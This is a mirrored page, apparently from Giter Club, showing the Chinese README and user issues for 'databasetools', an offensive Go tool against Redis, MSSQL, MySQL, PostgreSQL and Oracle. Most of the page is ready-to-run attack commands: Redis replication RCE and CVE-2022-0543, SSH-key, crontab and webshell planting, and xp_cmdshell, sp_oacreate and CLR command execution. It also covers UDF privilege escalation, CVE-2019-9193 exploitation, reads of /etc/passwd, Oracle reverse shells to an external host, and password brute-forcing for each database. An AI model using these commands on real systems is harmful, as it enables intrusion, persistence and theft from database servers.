Giter Club home page Giter Club logo

databasetools's Introduction

Redis

连接redis获取sql shell

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -cli

image.png

主从复制RCE

//Linux
go run .\main.go -redis  -rhost 192.168.111.211  -lhost 192.168.1.110 -exec -so exp.so
go run .\main.go -redis  -rhost 192.168.111.211  -lhost 192.168.1.110 -exec -console -so exp.so

image.png

Lua沙盒绕过命令执行(CVE-2022-0543)

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -lua -console

image.png

写公钥

将ssh.txt文件中公钥替换成自己生成的

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -sshkey

写Webshell

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -shell

image.png

定时任务

需要修改crontab.txt内容

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -crontab

MSSQL

连接数据库并获取一个sql shell

go run .\main.go -mssql -rhost 192.168.111.223 -rport 1433 -ruser sa -pwd "1qaz@WSX"  -cli

image.png

开启xp_cmdshell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isxp

image.png

xp_cmdshell获取一个执行系统命令的shell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isxp -console

image.png

xp_cmdshell执行单条系统命令

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX"  -isxp -docmd -cmd "whoami"

image.png

开启sp_oacreate

go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -issp

image.png

sp_oacreate获取一个执行系统命令的shell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -issp -console

image.png

sp_oacreate执行单条系统命令

go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX"  -issp -docmd -cmd "whoami"

image.png

CLR获取一个执行系统命令的shell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isclr -console

image.png

CLR执行单条系统命令

go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX"  -isclr -docmd -cmd "whoami"

image.png

log备份写getshell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -shell -logshell -path "C:\phpStudy\WWW\aa.php" -e 'php'

image.png

差异备份getshell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -difshell -path "C:\phpStudy\WWW\shell.php" -e 'php'

image.png

SSH连接

go run .\main.go -ssh -ruser root -rhost 192.168.111.139 -pwd "1qaz@WSX"

image.png

Mysql

连接获取sql shell

go run .\main.go -mysql -ruser root -rhost 192.168.111.134 -pwd "root" -rport 3306 -cli

image.png

into out file获取webshell

go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -shell -outfileshell -path "C:\\\\phpStudy\\\\WWW\\\\\aaa.php"

image.png

全局日志getshell

go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -shell -generallog -path C:\\\\phpStudy\\\\WWW\\\\aam.php

image.png

udf提权

go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -udf

image.png

postgresql

连接postgre数据库获取sql shell

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.162 -rport "5432" -cli

image.png

利用CVE-2019-9193循环执行命令

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -CVE20199193 -console

image.png

利用CVE-2019-9193执行单条命令

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -CVE20199193 -cmd "pwd"

image.png

单次文件读取(方法一)

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read1 -file "/etc/passwd"

image.png

循环文件读取(方法一)

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read1 -console

image.png

单次文件读取(方法二)

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read2 -file "/etc/passwd"

把hex值转换string即为结果 image.png

循环文件读取(方法二)

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read2 -console

image.png

列目录

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -list -file "./"

image.png

循环列目录

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -list -console

image.png

上传webshell

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -write -uploadpath "/tmp/shell.jsp" -e "jsp"

image.png

Oracle

使用之前需要安装oracle客户端 Windows下安装方法 解压下载的instantclient_21_8压缩包,将解压路径添加到系统变量path image.png Linux下正常支持Redis、Mysql、SQL Server、Postgresql,如想使用Oracle功能需要安装Oracle客户端驱动。在Kali下所有功能可完美运行

获取sql shell

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser test -pwd "1qaz@WSX" -sid helowin -cli

image.png

DBMS_Export_Extention循环执行命令

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dee -console

image.png

DBMS_Export_Extention执行单条命令

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dee -docmd -cmd "whoami"

image.png

DBMS_Export_Extention反弹shell

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -lhost 175.178.233.198 -lport 7776 -dee -re

image.png image.png

DBMS_XMLQUERY循环执行系统命令

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dx -console

image.png

DBMS_XMLQUERY执行单条系统命令

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dx -docmd -cmd "whoami"

image.png

卸载命令执行函数

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -del

image.png

dbms_java_test.funcall反弹shell

 go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -lhost 175.178.233.198 -lport 7776 -fc

image.png image.png

爆破数据库账号密码

Mysql

go run .\main.go -rhost 192.168.111.206 -rport 3306 -crack -m mysql

image.png

MSSQL

go run .\main.go -rhost 192.168.111.223 -rport 1433 -crack -m mssql

image.png

Postgresql

go run .\main.go -rhost 192.168.111.211 -rport 5432 -crack -m postgresql

image.png

Redis

go run .\main.go -rhost 192.168.111.211 -rport 6379 -crack -m redis

image.png

Oracle

go run .\main.go -rhost 192.168.111.211 -rport 1521 -crack -m oracle

image.png

databasetools's People

Contributors

hel10-web avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

adurak2 mssky9527 thinkergod ttsite sec-fork startagain2016 awdscan ruanzy506 zhanglei garyreload9527 darkkid0 nyx2022 lay0us istoliving hktalent bingpo no-github x-tfrk bbbfkl dbb-pro puzzithinker monster7992 f19t n00bl3ttuc3 n0o01 huangyuan666 z-bool empty2081 zhutougg s3rgeym teag1e hucw999 dk47os3r go-bi mxm-tools ecawen xiaojiang3106 sillylawliet pengge dawnadvent huayanqiaq listenquiet cts2021 rassec zsqya trevor3000 zoreko1 wuy-z yuxuanjiuqi nanaao ultramarine123 fasnow simlelcf jackypeng66 189er nothamor huitail6 want2live233 nnnnnr hdys0vn hi-kk testitok a55ure keyboardancer qlng qianniaoge starfork asylt liuyanjan kagantua 3as0n laozhnadajf q99266 zan8in h1d3r wiki-hub-2023 allblue147 andyoulovexy bobikle acodervic deepwebhacker

databasetools's Issues

连接mssql出现报错

./main -mssql -rhost 192.1.1.27 -rport 1433 -ruser sa -pwd "sa" -cli

`
2023/11/23 14:56:10 [-] TLS Handshake failed: tls: server selected unsupported protocol version 301
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x20 pc=0x4f3133]

goroutine 1 [running]:
database/sql.(*DB).conn(0x0, {0xbcf5f0, 0xc00011e000}, 0x1)
/usr/local/go/src/database/sql/sql.go:1288 +0x53
database/sql.(*DB).prepare(0xc00014bce8?, {0xbcf5f0, 0xc00011e000}, {0xae712c, 0x11}, 0x0?)
/usr/local/go/src/database/sql/sql.go:1586 +0x45
database/sql.(*DB).PrepareContext(0xc0004260c0?, {0xbcf5f0, 0xc00011e000}, {0xae712c, 0x11})
/usr/local/go/src/database/sql/sql.go:1555 +0x96
database/sql.(*DB).Prepare(...)
/usr/local/go/src/database/sql/sql.go:1576
Databasetools/pac.MssqlCMD({0xae712c?, 0xc00012c010?}, 0x7ffc75725744?)
/root/Databasetools/pac/mssql_cmd.go:15 +0x6e
Databasetools/pac.Help()
/root/Databasetools/pac/help.go:215 +0x926
main.main()
/root/Databasetools/main.go:8 +0x17
`

端口是9090为什么还是变成1433

go run .\main.go -mssql -rhost 14.23.58.6 -rport 9003 -ruser sa -pwd "xxxc" -cli

报错信息 unable to open tcp connection with host '14.23.58.6:1433': dial tcp 14.23.58.186:1433: connectex: No connection could be made because the target machine actively refused it.
panic: runtime error: invalid memory address or nil pointer dereference

redis 连接超时问题

您好,在使用工具进行学习时,对本地的测试环境进行 redis 未授权测试,本地搭建的环境是 vulntarget-a,本地攻击机 IP:192.168.3.164,目标出网机器:192.168.3.168,已获得出网机器权限,通过出网机器代理攻击内网设备 Win-2016,在本地攻击机中可以正常使用代理连接 Win-2016 上的 redis,以下为连接截图:
image
当我想使用您的工具进行下一步测试的时候,却一直提示连接超时的问题
image
我尝试修改过 redis 连接的超时时间为30秒
image
结果还是不能正常连接,请问是不是我哪里没设置对?感谢您的开源

oracle数据库连接问题

oracleshell.jar这个工具是支持普通权限和DBA权限的,你这边好像没写dba权限,我用system账号显示当前账号非DBA权限(oracle是windows)

1

而且oracle还可以列目录
希望可以添加上这两个功能

没超时啊

你好,代码写的很不错,我认真学习了好几天 也本地复现了好几天,有一个问题请教一下,如果是爆破什么的,如果网络很卡 超时问题 怎么解决啊?比如postgresql的超时问题

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.